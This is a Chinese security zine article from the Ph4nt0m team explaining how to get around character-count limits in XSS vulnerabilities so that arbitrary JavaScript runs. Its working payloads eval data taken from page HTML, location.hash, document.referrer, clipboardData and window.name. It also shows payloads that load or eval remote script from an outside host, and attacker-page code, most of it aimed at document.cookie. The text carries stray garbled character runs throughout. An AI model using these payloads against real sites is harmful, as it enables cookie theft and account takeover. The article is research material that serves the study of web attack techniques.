[PSTZine 0x03][0x04][突破XSS字符数量限制执行任意JS代码]

admin

                           ==Ph4nt0m Security Team==

                       Issue 0x03, Phile #0x04 of 0x07


|=---------------------------------------------------------------------------=|
4 q+ a- J; I1 E5 z3 V7 s4 |- {  B4 H|=-------------------=[ 突破XSS字符数量限制执行任意JS代码 ]=-----------------=|
|=---------------------------------------------------------------------------=|
|=---------------------------------------------------------------------------=|
! n' M1 t3 @/ ^1 a! J. y5 Y|=------------------------=[      By luoluo     ]=---------------------------=|
|=----------------------=[   <luoluo#ph4nt0m.org>  ]=------------------------=|
) v: x* [2 T3 [- c2 n% s|=----------------------=[    <luoluo#80sec.com>   ]=------------------------=|
|=---------------------------------------------------------------------------=|
! }% d- V7 ]) E! ]' L& I

[目录]

" F& `* v- j8 E1 o  U# x1. 综述
2. 突破方法
( ?% n6 `2 }" Q1 Q2 L# t  2.1 利用HTML上下文中其他可以控制的数据
1 q1 ?3 T6 T5 {; W; r  2.2 利用URL中的数据
- I2 O* Z& d0 o- }( Q  2.3 JS上下文的利用
6 T* t4 v( i4 J  2.4 利用浏览器特性在跨域的页面之间传递数据
! a- b6 v" B' v0 P6 u    2.4.1 document.referrer
! a* }  g- |  s/ C+ b9 O! H4 l2 @    2.4.2 剪切板clipboardData
    2.4.3 窗口名window.name
  2.5 以上的方式结合使用
3. 后记
3 n7 e/ I9 `2 @* |4. 参考

7 \- v6 k" z" ?% ]( y
一、综述
" A7 v1 r2 z9 m
    有些XSS漏洞由于字符数量有限制而没法有效的利用，只能弹出一个对话框来YY，本文主
要讨论如何突破字符数量的限制进行有效的利用，这里对有效利用的定义是可以不受限制执
行任意JS。对于跨站师们来说，研究极端情况下XSS利用的可能性是一种乐趣；对于产品安全
人员来说，不受限制的利用的可能是提供给开发人员最有力的证据，要求他们重视并修补这些
极端情况下的XSS漏洞。
; t, W% L( e  f' v4 ?. T5 F
    突破的方法有很多种，但是突破的思想基本都一样，那就是执行可以控制的不受限制的数
' Z# z5 W9 V) B& t1 h据。


7 g( Z* Z, w3 L# f% D% j二、突破方法
, e0 T- f# n( H: D
( T9 |$ O% w2 E  R8 L2 v4 R2.1 利用HTML上下文中其他可以控制的数据

    如果存在XSS漏洞的页面HTML上下文还有其他可以控制的数据，那么可以通过JS获得该数
9 u) E5 E3 p# ?% h. H: Y* {$ C据通过eval或者document.write/innerHTML等方式执行该数据，从而达到突破XSS字符数量限
制的目的，下面例子假设div元素的内部数据可以控制，但是该数据已经被HTML编码过：
2 y* R! J, _% N+ k3 o( S# \
+ p: Y; s6 Q3 n: f2 q--code-------------------------------------------------------------------------
<div id="x">可控的安全的数据</div>
<limited_xss_point>alert(/xss/);</limited_xss_point>
-------------------------------------------------------------------------------

5 M& g3 ~! t: j3 {4 |( [    由于XSS点有字符数量限制，所以这里只能弹框，那么我们可以把XSS的Payload通过escape
7 m0 o/ C* e* D) F+ k% Z: a编码后作为安全的数据，输出到可控的安全数据位置，然后在XSS点执行可控的安全数据：
0 G6 s; `" q( q+ m4 m
, `$ m$ u3 p2 z0 ~0 P" i--code-------------------------------------------------------------------------
9 P9 [4 x3 X, v7 h. ~<div id="x">alert%28document.cookie%29%3B</div>
<limited_xss_point>eval(unescape(x.innerHTML));</limited_xss_point>
3 h) E  E* b# Z1 `! O1 e# |. V, o$ d-------------------------------------------------------------------------------

( p! i9 h) T3 v1 J5 b长度：28 + len(id)
& @/ t* @7 L# p9 F9 Z+ b" F" _  M1 `5 K
% q; [; u8 v( M  V    由于x内部的数据没有字符数量的限制，那么从而可以达到执行任意JS的目的。
8 X+ w: ~* Z: X5 m: U
: m5 f* n1 m6 Z, Y/ K6 n
4 ?$ C2 G: a) Y5 S6 C# Q- o2.2 利用URL中的数据

    如果页面里不存在上一节所说的可控HTML上下文数据怎么办？有些数据是我们无条件可
- a, n8 K) ~# k: v1 T控的，第一个想到的就是URL，通过在URL的尾部参数构造要执行的代码，然后在XSS点通过
document.URL/location.href等方式获得代码数据执行，这里假设代码从第80个字符开始到
4 c0 b: Q4 Q/ {% _& g最后：
1 U/ k! h: F0 C' l* t
1 I8 X% m0 ^" R. m0 [- f) _7 X--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....&alert(document.cookie)

<limited_xss_point>eval(document.URL.substr(80));</limited_xss_point>
-------------------------------------------------------------------------------
! c# c% W+ w# n" m
长度：30

--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.substr(80));</limited_xss_point>
4 X8 j+ Z. `) L/ [8 K-------------------------------------------------------------------------------

长度：31

4 [5 }* q" b2 Z& L4 b5 @. I    上面两个例子对比，前一个例子更短，那么有没有办法更短呢？通过查阅JavaScript手册
的String的方法可以发现，切割字符串有一个更短的函数slice，5个字符比substr还要短一个
字符：

--code-------------------------------------------------------------------------
1 Q- }! x( W& ]0 n$ z: a* q& |<limited_xss_point>eval(document.URL.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
" l  Z2 T7 _5 F( T0 [( @; _
2 W; g" @3 C0 K3 l长度：29

--code-------------------------------------------------------------------------
<limited_xss_point>eval(location.href.slice(80));</limited_xss_point>
-------------------------------------------------------------------------------
( O6 ]' h6 D* T8 w4 f& ]( G% }' ]9 D
# G( X" z. M$ V长度：30

+ e" u! F& B0 [9 T    那么还有没有办法更短呢？答案是YES，查阅一下MSND里的location对象的参考你会发现
0 Z1 h7 m1 q) K/ h. z) j8 U有个hash成员，获取#之后的数据，那么我们可以把要执行的代码放在#后面，然后通过hash获
得代码执行，由于获得的数据是#开头的，所以只需要slice一个字符就可以拿到代码：
( ]6 [* s  N9 w# H* w
3 o% T, F0 `  ~  Q3 b+ E--code-------------------------------------------------------------------------
http://www.xssedsite.com/xssed.php?x=1....#alert(document.cookie)

<limited_xss_point>eval(location.hash.slice(1));</limited_xss_point>
1 {" m7 P$ _' k-------------------------------------------------------------------------------
& d3 t/ Z8 t5 M
: A5 B- a% l: p* j/ I  d- m长度：29

    这样比上面的例子又少了一个字符。那么还可以更短么？

6 d* T: D, A2 ~& r, Q& l
9 i- R& x) _3 C+ \0 |2.3 JS上下文的利用
5 u; Q# |& @7 P
    为什么我如此痛苦？那是因为JS和DHTML的方法名和属性名太长！瞧瞧这些“糟糕”的名字：

String.fromCharCode
! W9 n: Q$ k- L% D0 h9 s; fgetElementById
getElementsByTagName
document.write
XMLHTTPRequest
...

    就连开发人员也不愿意多写一次，于是很多站点的前端开发工程师们封装了各式各样的
3 @% C3 g. R$ U- m0 m简化函数，最经典的例子就是：
: D! I8 ~9 O. {. R
--code-------------------------------------------------------------------------
function $(id) {
' X8 E1 r) b& Q; |        return document.getElementById(id);
}
-------------------------------------------------------------------------------

    这些函数同样可以为我们所用，用来缩短我们的Payload的长度。不过上面这个例子不是
最短的，IE和FF都支持直接通过ID来引用一个元素。有些函数可以直接用来加载我们的代码：

--code-------------------------------------------------------------------------
function loads(url) {
1 H* Z+ N% u! v        ...
        document.body.appendChild(script);
}

& d7 V+ Z3 k( o  T<limited_xss_point>loads('http://xxx.com/x');</limited_xss_point>
-------------------------------------------------------------------------------

0 `/ E0 R+ ^3 l; v( e6 @" k7 f长度：len(函数名) + len(url) + 5
( O' K& K- L# V: f& X
. r" l3 y" P8 {    当然你的url则是越短越好哦！有些函数则会帮我们去作HTTP请求：
7 Z' g4 m  o: G2 W9 a3 |" K. |
5 _) H4 Q+ \/ G* E4 A# j--code-------------------------------------------------------------------------
" @$ B' g/ [+ m) Sfunction get(url) {
        ...
# `- c5 F; ^( l. h        return x.responseText;
}

# j+ Q5 b( |- U! y<limited_xss_point>eval(get('http://xxx.com/x'));</limited_xss_point>
1 r, S. d1 D0 M9 X# o/ v' A  B- A; R-------------------------------------------------------------------------------

1 _5 x; P( T+ D/ P0 w# F" O! l长度：len(函数名) + len(url) + 11

+ g/ K+ B' v$ a/ K) k    道哥则提出有些流行的JS的开发框架也封装了大量功能强劲的库可供调用，比如：

6 l$ F; Q3 V1 ?& K8 T! WJQuery
YUI
...
! x; A' @) U, E, V
8 s& T6 J( D) G  N    综上所述，我们可以通过分析JS上下文现有的框架、对象、类、函数来尽可能的缩短我
们的代码，进而突破长度限制执行任意代码。

: z: D* {0 n9 x2 X
2.4 利用浏览器特性在跨域的页面之间传递数据

    虽然有同源策略的限制，浏览器的功能设计上仍然保留了极少数的可以跨域传递数据的
方法，我们可以利用这些方法来跨页面传递数据到被XSS的域的页面去执行。
) ^( K) E5 L* R; O$ H7 }
& m* q! \$ X1 _2.4.1 document.referrer
: G2 W. x; Z. ]  j1 V& R: E$ j
    攻击者可以在自己的域上构造页面跳转到被XSS页面，在自己域上的页面的url里带了
Payload，被XSS的页面通过referrer获取相关代码执行。
* m) Z: K0 Z, C7 U! G
攻击者构造的的页面：
; H! m7 E/ Q, z2 n/ w) g0 ]8 q
7 j; h: L  h3 j  a, ?--code-------------------------------------------------------------------------
) R) x) q. J- o% G& v6 [http://www.a.com/attack.html?...&alert(document.cookie)
. b+ J9 v* \- M" r1 n4 V
( e% f) ]/ h6 S" O. J<a href="http://www.xssedsite.com/xssed.php">go</a>
-------------------------------------------------------------------------------

0 z9 y0 X* }3 a' k+ r1 o被XSS的页面：
$ n! k' ]) k7 H- O" O, L
! S4 Y. e. S% {) i! F* `0 I--code-------------------------------------------------------------------------
; n" X# I' N. w7 y" `5 a<limited_xss_point>eval(document.referrer.slice(80));</limited_xss_point>
8 j- w- e4 d. y3 |7 h-------------------------------------------------------------------------------

长度：34
4 D6 ~: i. \) o
; Q$ O4 q& O& A8 T5 \    这种方式利用上还有一些问题，如果使用location.href或者<meta http-equiv=refresh>
! v4 R* k* y; q  [实现的自动跳转，在IE里被攻击页面拿不到referrer，而FF则可以。QZ建议用表单提交的方式
# ~+ d, E! O- {0 F- z& w: d比较好，我测试了下，果然通用，FF/IE都可以成功获取referrer：

. h% J( D: E0 S1 Q--code-------------------------------------------------------------------------
<script type="text/javascript">
<!--
8 g2 N/ Q! q! C1 rwindow.onload = function(){
        var f = document.createElement("form");
        f.setAttribute("method", "get");
        f.setAttribute("action", "http://www.xssedsite.com/xssed.php");
        document.body.appendChild(f);
        f.submit();
};
//-->
</script>
-------------------------------------------------------------------------------

7 p/ A/ x: P+ _+ m
2.4.2 剪切板clipboardData
) Y1 Z' z/ D( ]  }2 O! w) J
    攻击者在自己域的页面上通过clipboardData把Payload写入剪切板，然后在被XSS页面获
取并执行该数据。
1 V& K6 {+ C6 p
. ^! V6 \; v  g. O; Q4 y* S% i攻击者构造的页面：

--code-------------------------------------------------------------------------
7 i. h- ]# u" I  V' l5 z<script>
clipboardData.setData("text", "alert(document.cookie)");
: w( ^- q6 g/ q* h$ ^: A. y1 u, y5 h</script>
0 r9 N$ F0 D# E+ z3 c7 }- v8 c( r-------------------------------------------------------------------------------

4 J7 k4 A. Z0 z& @$ j( I被XSS的页面：
7 }) y, d0 H( M$ e
; M1 v0 N. }4 a4 h' C--code-------------------------------------------------------------------------
# i* s8 w2 l% N/ g0 _9 Z<limited_xss_point>eval(clipboardData.getData("text"));</limited_xss_point>
- C1 k9 h0 x" q-------------------------------------------------------------------------------
( Z0 N- w& z' \& s) e
长度：36
4 {- H7 Q6 F9 v* r
3 I( W8 u1 ]- `6 ?7 n- ]    这种方式只适用于IE系列，并且在IE 7及以上版本的浏览器会有安全提示。
+ X" O! i( |/ ~/ z

8 x7 N) _$ ^7 g2.4.3 窗口名window.name
, f- q  Q9 R& W% x8 \
5 p: r1 `* r6 x+ `- w7 }/ j    这是一个很少被用到的特性，在研究同源策略时就注意过这个属性，它是可以跨域传递数
据的，但是这个特性本身并不是漏洞。

    如果仔细研究过window.open这个方法，会发现一个不常用的第二个参数，这个则是设置
窗口名，用于指定target窗口，如果不存在的话则创建新的子窗口，并设置子窗口的name。当
, M0 D9 Z9 I) x我想打搜window.open时一阵狂喜，喜的是window.name这个属性是window对象的成员，那么只
& Z5 B% ]% G, S: y6 M3 Q需要name就可以引用该属性，但是测试时却发现window.open方法对于第二个参数进行了严格
. M, Y+ Q1 P: v/ M6 j; Q# A的检查，只允许数字字母以及下划线的组合，禁止特殊字符进入，那么这种方式就没法写入JS
或者VBS。

0 i! w8 Z8 R* d; D- S    但是经过测试发现我们可以通过window.name直接设置当前窗口的name则没有特殊字符
4 w1 s& A2 N* Y$ m2 k2 z! n限制，然后直接跳转到被XSS的页面，通过name属性传递Payload过去执行：

攻击者构造的页面：

--code-------------------------------------------------------------------------
& k) S; r/ R& t$ ]<script>
window.name = "alert(document.cookie)";
- J# v4 F9 h; R/ p% P" Hlocaton.href = "http://www.xssedsite.com/xssed.php";
</script>
-------------------------------------------------------------------------------
4 q& Q0 U" }% J$ A; D2 p' r4 w
2 s4 n. K- O/ k% ]  D被XSS的页面：

* O+ k& j5 n- {$ M! X--code-------------------------------------------------------------------------
4 n4 z% p/ p+ @) U( k<limited_xss_point>eval(name);</limited_xss_point>
-------------------------------------------------------------------------------

* c$ r+ [, C0 r/ f6 S长度：11

    这个长度可以说是短到极致了，并且这个方法IE/FF都可以很好的支持，是个非常有意思
5 f" z* ^! u" x7 E: Z的技巧，这个技巧的发现也是促成本文的直接原因。

, E/ G4 l* U/ R! d. `1 j4 d    window.name的特性还有其他一些有趣的应用方式，这个方面的话题以后可以专门写篇文
3 I9 T$ X9 X+ E* |. w6 t4 v章来探讨。


3 R1 n7 E, @' N  @4 P/ M9 d2.5 以上的方式结合使用

5 H4 {1 m6 `1 A9 ~    以上的方式结合使用，一般情况下会使得长度更长，但是也不排除在某些变态的过滤情况
中，灵活的组合上面的方法可能会起到奇效。


, \3 [/ s) J/ N+ _/ F- z三、后记

, u# U- B8 `+ D5 S+ ~& Z" b    JS非常灵活，所以方法肯定不限于这些，在具体的问题的分析和研究中，可以获得很多的
" _- w% l! a+ ]乐趣，并且对JS以及浏览器本身有了更深的认识，如果您有巧妙的技巧或者新奇的构思，欢迎
6 u4 G; @# |% k和我交流！

& [( p3 W: b7 Q4 C4 [6 k+ M3 w    感谢axis*刺*大风*道哥、rayh4c*QZ*茄子为本文提出的宝贵意见！

    本文是纯粹的技术探讨，请勿用于非法用途！

  K8 j5 G* B( W9 x8 a
四、参考
. ]& Z8 v# b3 m% d
http://msdn.microsoft.com/en-us/library/aa155073.aspx

-EOF-